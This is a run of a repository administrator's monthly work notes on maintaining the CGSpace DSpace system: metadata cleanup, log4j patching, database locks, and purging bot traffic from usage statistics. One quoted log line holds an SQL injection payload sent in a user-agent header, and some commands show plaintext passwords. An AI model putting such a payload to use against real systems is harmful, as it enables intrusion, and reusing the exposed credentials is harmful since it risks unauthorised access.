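- The override is just a plain-text list of agent patterns, so the change plus a purge of any existing hits is roughly this (a sketch, using the same override file and script as elsewhere in these notes):
```console
$ echo 'GARDIAN' >> dspace/config/spiders/agents/ilri
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
```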
## 2021-12-05
- Proof fifty records Abenet sent me from Africa Rice Center ("AfricaRice 1st batch Import")
- Fixed forty-six incorrect collections
- Cleaned up and normalized affiliations
- Cleaned up dates (extra `*` character in all?)
- Cleaned up citation format
- Fixed some encoding issues in abstracts
- Removed empty columns
- Removed one duplicate: Enhancing Rice Productivity and Soil Nitrogen Using Dual-Purpose Cowpea-NERICA® Rice Sequence in Degraded Savanna
- Added volume and issue metadata by extracting it from the citations
- All PDFs hosted on davidpublishing.com are dead...
- All DOIs linking to African Journal of Agricultural Research are dead...
- Fixed a handful of items marked as "Open Access" that are actually closed
- Added many missing ISSNs
- Added many missing countries/regions
- Fixed invalid AGROVOC terms and added some more based on article subjects
- I also made some minor changes to the [CSV Metadata Quality Checker](https://github.com/ilri/csv-metadata-quality)
- Added the ability to check if the item's title exists in the citation
- Updated to only run the mojibake check if we're not running in unsafe mode (so we don't print the same warning during both the check and fix steps)
- I ran the re-harvesting on AReS
## 2021-12-06
- Some minor work on the `check-duplicates.py` script I wrote last month
- I found some corner cases where there were items that matched in the database, but they were `in_archive=f` and/or `withdrawn=t`, so now I check that before trying to resolve the handles of potential duplicates
- More work on the Africa Rice Center 1st batch import
- I merged the metadata for three duplicates in Africa Rice's items and mapped them on CGSpace
- I did a bit more work to add missing AGROVOC subjects, countries, regions, extents, etc and then uploaded the forty-six items to CGSpace
- I started looking at the seventy CAS records that Abenet has been working on for the past few months
## 2021-12-07
- I sent Vini from CGIAR CAS some questions about the seventy records I was working on yesterday
- Also, I ran the `check-duplicates.py` script on them and found that they might ALL be duplicates!!!
- I tweaked the script a bit more to use the issue dates as a third criterion and now there are fewer duplicates, but it's still at least twenty or so...
- The script now checks if the issue date of the item in the CSV and the issue date of the item in the database are less than 365 days apart (by default)
- For example, many items like "Annual Report 2020" can have similar title and type to previous annual reports, but are not duplicates
- I noticed a strange user agent in the XMLUI logs on CGSpace:
```console
20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
```
- I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
- It could be someone on Azure?
- I opened [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/49) and I'll add this user agent to our local override until they decide to include it or not
- I purged 34,000 hits from this user agent in our Solr statistics:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 34458 hits from HeadlessChrome in statistics
Total number of bot hits purged: 34458
```
- Meeting with partners about repositories in the One CGIAR
## 2021-12-08
- Finalize country/region changes in csv-metadata-quality checker and release v0.5.0: https://github.com/ilri/csv-metadata-quality/releases/tag/v0.5.0
- This also includes the mojibake fixes and title/citation checks and some bug fixes
## 2021-12-09
- Help Francesca upload the dataset for one CIAT publication (it has like 100 authors so we did it via CSV)
## 2021-12-12
- Patch OpenRXV's Elasticsearch for the CVE-2021-44228 log4j vulnerability and re-deploy AReS
- I added `-Dlog4j2.formatMsgNoLookups=true` to the Elasticsearch Java environment
- Run AReS harvesting
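- To double check that the flag actually ended up in the container's environment you can inspect it (the container name here is an assumption):
```console
$ docker inspect elasticsearch -f '{{range .Config.Env}}{{println .}}{{end}}' | grep log4j2
```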
## 2021-12-13
- I ran the `check-duplicates.py` script on the 1,000 items from the CGIAR System Office TAC/ICW/Green Cover archives and found hundreds or thousands of potential duplicates
- I sent feedback to Gaia
- Help Jacquie from WorldFish try to find all outputs for the Fish CRP because there are a few different formats for that name
- Create a temporary account for Rafael Rodriguez on DSpace Test so he can investigate the submission workflow
- I added him to the admin group on the Alliance community...
## 2021-12-14
- I finally caught some stuck locks on CGSpace after checking several times per day for the last week:
```console
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
1508
```
- Now looking at the locks query sorting by age of locks:
```console
$ cat locks-age.sql
SELECT a.datname,
l.relation::regclass,
l.transactionid,
l.mode,
l.GRANTED,
a.usename,
a.query,
a.query_start,
age(now(), a.query_start) AS "age",
a.pid
FROM pg_stat_activity a
JOIN pg_locks l ON l.pid = a.pid
ORDER BY a.query_start;
```
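- It can be run against the DSpace database like so:
```console
$ psql dspace < locks-age.sql
```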
- The oldest locks are 9 hours and 26 minutes old and the time on the server is `Tue Dec 14 18:41:58 CET 2021`, so it seems something happened around 9:15 this morning
- I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)
- I looked at the DSpace log, but didn't see anything interesting there: only editors making edits...
- I looked at the nginx REST API logs and saw lots of GET action there from Drupal sites harvesting us...
- So I'm not sure what is causing this... perhaps something in the XMLUI submission / task workflow
- For now I just ran all system updates and rebooted the server
- I also enabled Atmire's `log-db-activity.sh` script to run every four hours (in the DSpace user's crontab) so perhaps that will be better than me checking manually
- Regarding Gaia's 1,000 items to upload to CGSpace, I checked the eighteen Green Cover records and there are no duplicates, so that's at least a starting point!
- I sent her a spreadsheet with the eighteen items with a new collection column to indicate where they should go
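- For reference, the crontab entry for that `log-db-activity.sh` job is roughly this (the path to the script is an assumption on my part):
```console
# every four hours, at minute 0 (script path is an assumption)
0 */4 * * * /home/dspace/bin/log-db-activity.sh
```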
## 2021-12-16
- Working on the CGIAR CAS Green Cover records for Gaia
- Add months to dcterms.issued from PDFs
- Add languages
- Format and fix several authors
- I created a SAF archive with SAFBuilder and then imported it to DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
```
## 2021-12-19
- I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:
```console
> openrxv-backend@0.0.1 build
> nest build
node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Found 2 error(s).
```
- I'm not sure why, because I built the backend successfully on my local machine...
- For now I just ran all the system updates and rebooted the machine (linode20)
- Then I started a fresh harvest
- Now I cleared all images on my local machine and I get the same error when building the backend
- It seems to be related to [`@elastic/elasticsearch-js`](https://github.com/elastic/elasticsearch-js), which our `package.json` pins with version `^7.13.0`
- I see that AReS is currently using 7.15.0 in its `package-lock.json`, and 7.16.0 was released four days ago so perhaps it's that...
- Pinning `~7.15.0` allows nest to build fine...
- I made a pull request
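- The pin itself is a one-line change in the backend's `package.json`, roughly like this (the paths and service name are from memory, so treat it as a sketch):
```console
$ sed -i 's|"@elastic/elasticsearch": "^7.13.0"|"@elastic/elasticsearch": "~7.15.0"|' backend/package.json
$ docker-compose build backend
```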
- But since software sucks, now I get an error in the frontend while starting nginx:
```console
nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
```
- In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I'm happy to see that the [release notes for version 6](https://raw.githubusercontent.com/redis/redis/6.0/00-RELEASENOTES) say that it is compatible with 5 except for one minor thing that we don't seem to be using (SPOP?)
- For reference I see that our Redis 5 container is based on Debian 11, which I didn't expect... but I still want to try to upgrade to Redis 6 eventually:
```console
$ docker exec -it redis bash
root@23692d6b51c5:/data# cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
NAME="Debian GNU/Linux"
VERSION_ID="11"
VERSION="11 (bullseye)"
VERSION_CODENAME=bullseye
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
```
- I bumped the version to 6 on my local test machine and the logs look good:
```console
$ docker logs redis
1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
1:M 19 Dec 2021 19:27:15.584 # Server initialized
1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
```
- The interface and harvesting all work as expected...
- I pushed the update to OpenRXV
- I also fixed the weird "unsafe" issue in the links on AReS that Abenet told me about last week
- When testing my local instance I realized that the `thumbnail` field was missing on the production AReS, and that somehow breaks the links
## 2021-12-22
- Fix apt error on DSpace servers due to updated `/etc/java-8-openjdk/security/java.security` file
## 2021-12-23
- Add support for dropping invalid AGROVOC subjects to csv-metadata-quality
- Move invalid AGROVOC subjects in Gaia's eighteen green cover items on DSpace Test to `cg.subject.system`
- I created an "approve" user for Rafael from CIAT to do tests on DSpace Test:
```console
$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
```
## 2021-12-27
- Start a fresh harvest on AReS
## 2021-12-29
- Looking at the top IPs and user agents on CGSpace's Solr statistics I see a strange user agent:
```console
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
```
- I found two IPs using user agents with the "randint" bug:
- 47.252.80.214 (AliCloud in the US)
- 61.143.40.50 (ChinaNet in China)
- I wonder what other requests have been made from those hosts where the randint spoofer was working... ugh.
- I found some IPs from the Russian SELECTEL network making thousands of requests with SQL injection attempts...
- 45.134.26.171
- 45.146.166.173
- 3.225.28.105 is on Amazon and making thousands of requests for the same URL:
```console
/rest/collections/1118/items?expand=all&limit=1
```
- Most of the time it has a real-looking user agent, but sometimes it uses `Apache-HttpClient/4.3.4 (java 1.5)`
- Another 82.65.26.228 is doing SQL injection attempts from France
- 216.213.28.138 is some scrape-as-a-service bot from Sprious
- I used my `resolve-addresses-geoip2.py` script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:
```console
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
2 10620
2 265696
2 6147
2 9299
3 3269
5 16509
5 49505
9 24757
9 24940
9 64267
```
- AS 64267 is Sprious, and it has used these IPs this month:
- 216.213.28.136
- 207.182.27.191
- 216.41.235.187
- 216.41.232.169
- 216.41.235.186
- 52.124.19.190
- 216.213.28.138
- 216.41.234.163
- To be honest I want to ban all their networks but I'm afraid it's too many IPs... hmmm
- I'm going to purge all of these for sure though, as they are a scraping-as-a-service company and don't use proper user agents or request robots.txt
- AS 24940 is Hetzner, but I don't feel like going through all the IPs to see... they always pretend to be normal users and make semi-sane requests so it might be a proxy or something
- AS 24757 is Ethiopian Telecom
- AS 49505 is the Russian Selectel, and it has used these IPs this month:
- 45.146.166.173
- 45.134.26.171
- 45.146.164.123
- 45.155.205.231
- 195.54.167.122
- I will purge them all too because they are up to no good, as I already saw earlier today (SQL injections)
- AS 16509 is Amazon, and it has used these IPs this month:
- 18.135.23.223 (made requests using the `Mozilla/5.0 (compatible; U; Koha checkurl)` user agent, so I will purge it and add it to our DSpace user agent override and [submit to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/51))
- 54.76.137.83 (made hundreds of requests to "/" with a normal user agent)
- 34.253.119.85 (made hundreds of requests to "/" with a normal user agent)
- 34.216.201.131 (made hundreds of requests to "/" with a normal user agent)
- 54.203.193.46 (made hundreds of requests to "/" with a normal user agent)
- I ran the script to purge spider agents with the latest updates:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 2530 hits from HeadlessChrome in statistics
Purging 10676 hits from randint in statistics
Purging 3579 hits from Koha in statistics
Total number of bot hits purged: 16785
```
- Then the IPs:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
Purging 1190 hits from 216.213.28.136 in statistics
Purging 1128 hits from 207.182.27.191 in statistics
Purging 1095 hits from 216.41.235.187 in statistics
Purging 1087 hits from 216.41.232.169 in statistics
Purging 1011 hits from 216.41.235.186 in statistics
Purging 945 hits from 52.124.19.190 in statistics
Purging 933 hits from 216.213.28.138 in statistics
Purging 930 hits from 216.41.234.163 in statistics
Purging 4410 hits from 45.146.166.173 in statistics
Purging 2688 hits from 45.134.26.171 in statistics
Purging 1130 hits from 45.146.164.123 in statistics
Purging 536 hits from 45.155.205.231 in statistics
Purging 10676 hits from 195.54.167.122 in statistics
Purging 1350 hits from 54.76.137.83 in statistics
Purging 1240 hits from 34.253.119.85 in statistics
Purging 2879 hits from 34.216.201.131 in statistics
Purging 2909 hits from 54.203.193.46 in statistics
Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
Total number of bot hits purged: 37959
```
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-01.md
---
title: "January, 2022"
date: 2022-01-01T15:20:54+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-01-01
- Start a full harvest on AReS
<!--more-->
## 2022-01-06
- Add ORCID identifier for Chris Jones to CGSpace
- Also tag eighty-eight of his items in CGSpace:
```console
$ cat 2022-01-06-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper'
```
## 2022-01-09
- Validate and register CGSpace on [OpenArchives](https://www.openarchives.org/Register/ValidateSite?log=Z2V7WCT7)
- Last month IWMI colleagues were asking me to look into this, and after checking the OpenArchives mailing list it seems there was a problem on the server side
- Now it has worked and the message is "Successfully updated OAI registration database to status COMPLIANT."
- I received an email (as the Admin contact on our OAI) that says:
> Your repository has been registered in the OAI database of conforming repositories.
- Now I'm taking a screenshot of the validation page for posterity, because the logs seem to go away after some time
![OpenArchives.org registration](/cgspace-notes/2022/01/openarchives-registration.png)
- I tried to re-build the Docker image for OpenRXV and got an error in the backend:
```console
...
> openrxv-backend@0.0.1 build
> nest build
node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Found 2 error(s).
```
- Ah, it seems the code on the server was slightly out of date
- I checked out the latest master branch and it built
## 2022-01-12
- Fix some citation formatting issues in Gaia's [eighteen CAS Green Cover publications on DSpace Test](https://dspacetest.cgiar.org/handle/10568/115230)
## 2022-01-19
- Francesca was having issues with a submission on CGSpace this week
- I checked and see a lot of locks in PostgreSQL:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (3506 rows)
1 application_name
9 psql
10
3487 dspaceWeb
```
- As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the `log_lock_waits` setting last month:
```console
$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
12
```
- I set a system alert on DSpace and then restarted the server
## 2022-01-20
- Abenet gave me a thumbs up for Gaia's eighteen CAS Green Cover items from last month
- I created a SimpleArchiveFormat bundle with SAFBuilder and then imported them on CGSpace:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
```
## 2022-01-21
- Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
- I did some cleanups and standardization of author names
- I also noticed that a few dozen items had no dates at all, so I checked the PDFs and found dates for them in the text
- Otherwise all items have only a year, which is not great...
- Proof of concept upgrade of OpenRXV from Angular 9 to Angular 10
- I did some basic tests and created a [pull request](https://github.com/ilri/OpenRXV/pull/128)
## 2022-01-22
- Spend some time adding months to the CGIAR TAC and ICW records from Gaia
- Most of the PDFs have only YYYY, so this is annoying...
## 2022-01-23
- Finalize cleaning up the dates on the CGIAR TAC and ICW records from Gaia
- Rebuild AReS and start a fresh harvest
## 2022-01-25
- Help Udana from IWMI answer some questions about licenses on their journal articles
- I was surprised to see they have 921 total, but only about 200 have a `dcterms.license` field
- I updated about thirty manually, but really Udana should do more...
- Normalize the metadata `text_lang` attributes on CGSpace database:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2803350
en | 6232
| 3200
fr | 2
vn | 2
92 | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
UPDATE 9433
```
- Then export the WLE Journal Articles collection again so there are fewer columns to mess with
## 2022-01-26
- Send Gaia an example of the duplicate report for the first 200 TAC items to see what she thinks
## 2022-01-27
- Work on WLE's Journal Articles a bit more
- I realized that ~130 items have DOIs in their citation, but no `cg.identifier.doi` field
- I used this OpenRefine GREL to copy them:
```
cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
```
- I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don't put DOIs in the citation so it's not possible to fix items that are missing DOIs that way
- And I cleaned up and normalized some licenses
- Francesca from Bioversity was having issues with a submission on CGSpace again
- I looked at PostgreSQL and see an increasing number of locks:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (537 rows)
1 application_name
9 psql
51 dspaceApi
477 dspaceWeb
$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
3
```
- I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
- The issue in Francesca's case was actually that someone had taken the task, not that PostgreSQL transactions were locked!
## 2022-01-28
- Finalize the last ~100 WLE Journal Article items without licenses and DOIs
- I did as many as I could, also updating http links to https for many journal links
- Federica Bottamedi contacted us from the system office to say that she took over for Vini (Abhilasha Vaid)
- She created an account on CGSpace and now we need to see which workflows she should belong to
- Start a fresh harvesting on AReS
- I adjusted the `check-duplicates.py` script to write the output to a CSV file including the id, both titles, both dates, and the handle link
- I included the id because I will need a unique field to join the resulting list of non-duplicates with the original CSV where the rest of the metadata and filenames are
- Since these items are not in DSpace yet, I generated simple numeric IDs in OpenRefine using this GREL transform: `row.index + 1`
- Then I ran `check-duplicates.py` on items 1 to 200 and sent the resulting CSV to Gaia
- Delete one duplicate item I saw in IITA's Journal Articles that was uploaded earlier in WLE
- Also do some general cleanup on IITA's Journal Articles collection in OpenRefine
- Delete one duplicate item I saw in ILRI's Journal Articles collection
- Also do some general cleanup on ILRI's Journal Articles collection in OpenRefine and csv-metadata-quality
## 2022-01-29
- I did some more cleanup on the ILRI Journal Articles
- I added missing journal titles for items that had ISSNs
- Then I added pages for items that had them in the citation
- First, I faceted the citation field based on whether or not the item had something like ": 232-234" present:
```console
value.contains(/:\s?\d+(-|)\d+/)
```
- Then I faceted by blank on `dcterms.extent` and did a transform to extract the page information for over 1,000 items!
```console
'p. ' +
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
'-' +
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
```
- Then I did similar for `cg.volume` and `cg.issue`, also based on the citation, for example to extract the "16" from "Journal of Blah 16(1)", where "16" is the second capture group in a zero-based match:
```console
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
```
- This was 3,000 items so I imported the changes on CGSpace 1,000 at a time...
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-02.md
---
title: "February, 2022"
date: 2022-02-01T14:06:54+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-02-01
- Meeting with Peter and Abenet about CGSpace in the One CGIAR
- We agreed to buy $5,000 worth of credits from Atmire for future upgrades
- We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
- We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
- We agreed to try to do more alignment of affiliations/funders with ROR
<!--more-->
- I moved a bunch of communities:
```console
$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
```
- Remove CPWF and CTA subjects from the Discovery facets
- Start a full Discovery index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 275m15.777s
user 182m52.171s
sys 2m51.573s
```
- I got a request to confirm validation of CGSpace on openarchives.org, with the requestor's IP being 128.84.116.66
- That is at Cornell... hmmmm who could that be?!
- Oh, the OpenArchives initiative is at Cornell... maybe this is an automated periodic check?
## 2022-02-02
- Looking at the top user agents and IP addresses in CGSpace's Solr statistics for 2022-01
- 64.39.98.40 made 26,000 requests, owned by Qualys so it's some kind of security scanning
- 45.134.26.171 made 8,000 requests and it's owned by some Russian company and makes requests like this, hmmmm:
```console
45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
```
- 3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
- The user agent is sometimes a normal user one, and sometimes `Apache-HttpClient/4.3.4 (java 1.5)`
- 217.182.21.193 made 2,400 requests and is on OVH
- I purged these hits
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 26817 hits from 64.39.98.40 in statistics
Purging 9446 hits from 45.134.26.171 in statistics
Purging 6490 hits from 3.225.28.105 in statistics
Purging 11949 hits from 217.182.21.193 in statistics
Total number of bot hits purged: 54702
```
- Export donors and affiliations from CGSpace database:
```console
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
COPY 1036
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
COPY 7901
```
- Then check matches against the latest ROR dump:
```console
$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
...
```
- I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)
- I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)
- Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test
- Mishell from CIP sent me a copy of a security scan their ICT had done on CGSpace using QualysGuard
- The report was very long and generic, highlighting low-severity things like being able to post crap to search forms and have it appear on the results page
- Also they say we're using old jQuery and bootstrap, etc (fair enough) but there are no exploits per se
- At least now I know why all those Qualys IPs are scanning us all the time!!!
- Mishell also said she's having issues logging into CGSpace
- According to the logs her account is failing on LDAP authentication
- I checked CGSpace's LDAP credentials using ldapsearch and was able to connect so it's gotta be something with her account
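- The check was something along these lines (the host, bind DN, and base DN here are placeholders, not our real values):
```console
$ ldapsearch -x -H ldaps://ldap.example.org -D 'cn=cgspace-bind,ou=service,dc=example,dc=org' -W \
    -b 'dc=example,dc=org' '(sAMAccountName=mishell)' dn
```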
## 2022-02-03
- I synchronized DSpace Test with a fresh snapshot of CGSpace
- I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the `dspace filter-media` script manually and eventually it crashed:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
...
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
File: Agreement_on_the_Estab_of_ILRI.doc.txt
Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
